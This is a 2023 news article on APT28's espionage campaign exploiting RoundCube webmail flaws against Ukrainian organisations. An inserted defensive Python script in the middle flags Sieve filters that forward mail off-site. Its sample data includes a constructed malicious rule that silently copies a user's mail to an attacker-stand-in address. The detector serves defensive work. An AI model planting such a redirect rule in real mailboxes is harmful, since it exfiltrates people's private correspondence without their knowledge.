21 June 2023

Russia’s APT28 breached Ukrainian orgs via RoundCube flaws

Russia’s GRU military hacking unit known as APT28 (Fancy Bear, Forest Blizzard or Blue Delta) has been observed compromising government institutions and military entities involved in aircraft infrastructure in Ukraine via security flaws in vulnerable RoundCube webmail servers.

According to reports from Ukraine’s computer emergency response team (CERT-UA) and Recorded Future’s Insikt Group, the espionage campaign involved spearphishing attacks using news about Russia’s war against Ukraine to entice recipients into opening emails.

The APT28 campaign exploited three vulnerabilities in the RoundCube email software (CVE-2020-35730, CVE-2020-12641, and CVE-2021-44026) to run malicious scripts designed to perform reconnaissance on RoundCube servers, redirect incoming emails to an attacker-controlled address, and collect session cookies, user information, and address books.

The email attachment contained JavaScript code that executed additional JavaScript payloads from the attacker-controlled infrastructure.
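The mail-redirection step described above is one thing defenders can look for after the fact. The following Python is an added example, not code from CERT-UA, Insikt Group or the RoundCube project; it assumes users' filters are stored as Sieve scripts (as with RoundCube's managesieve plugin) and that the organisation's own domains are known (the `example.org` names and the sample scripts are constructed placeholders):

```python
"""Flag Sieve filter rules that forward a user's mail outside the organisation.

Added example: a planted redirect rule is a quiet way to keep a copy of every
incoming message, so per-user Sieve scripts are worth reviewing after a webmail
compromise.  Domains and sample scripts below are constructed placeholders.
"""
import re
from typing import Dict, Iterable, List, Tuple

INTERNAL_DOMAINS = {"example.org", "mail.example.org"}  # constructed

# Sieve "redirect" takes one quoted address; optional tags such as :copy may precede it.
REDIRECT_RE = re.compile(r'\bredirect\b(?:\s+:\w+)*\s+"([^"]+)"', re.IGNORECASE)


def redirect_targets(script: str) -> List[str]:
    """Every address named in a redirect action, with Sieve comments ignored."""
    stripped = re.sub(r"#[^\n]*", "", script)                  # '#' line comments
    stripped = re.sub(r"/\*.*?\*/", "", stripped, flags=re.S)  # /* block */ comments
    return REDIRECT_RE.findall(stripped)


def external_redirects(script: str, internal: Iterable[str] = INTERNAL_DOMAINS) -> List[str]:
    """Redirect targets whose domain is not one of the organisation's own."""
    internal = {d.lower() for d in internal}
    return [addr for addr in redirect_targets(script)
            if addr.rsplit("@", 1)[-1].lower() not in internal]


def review_scripts(scripts: Dict[str, str]) -> List[Tuple[str, str]]:
    """(user, address) pairs an analyst should look at, across all users' scripts."""
    return [(user, addr) for user, script in scripts.items()
            for addr in external_redirects(script)]


# Constructed sample scripts: a benign filing rule, and a rule copying mail off-site.
SAMPLE_SCRIPTS = {
    "alice": 'require ["fileinto"];\nif header :contains "subject" "newsletter" { fileinto "News"; }\n',
    "bob": ('require ["copy"];\n'
            '# :copy keeps normal delivery, which is why such rules tend to go unnoticed\n'
            'redirect :copy "collector@attacker-mailbox.invalid";\n'
            'redirect "bob.backup@mail.example.org";\n'),
}

if __name__ == "__main__":
    for user, addr in review_scripts(SAMPLE_SCRIPTS):
        print(f"{user}: mail is forwarded to external address {addr}")
```

Running it on the constructed scripts reports only bob's off-site copy; the internal backup address and alice's filing rule are not flagged.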

Recorded Future says that this campaign was carried out by the same subgroup that abused a flaw (CVE-2023-23397) in Microsoft’s Outlook email software in targeted attacks against a limited number of organizations in government, transportation, energy, and military sectors in Europe.

In April, Ukrainian hacktivists leaked the personal information and correspondence of Lieutenant Colonel Sergey Alexandrovich Morgachev, an officer of the Russian Main Intelligence Directorate of the General Staff of the Russian Army (GRU) and a suspected leader of APT28.

In May, the same hacktivists exposed the personal information and photo of Viktor Borisovich Netyksho, an officer in Russia’s Intelligence Directorate of the General Staff (GRU) wanted in the United States for his alleged involvement in the 2016 US presidential election hack.
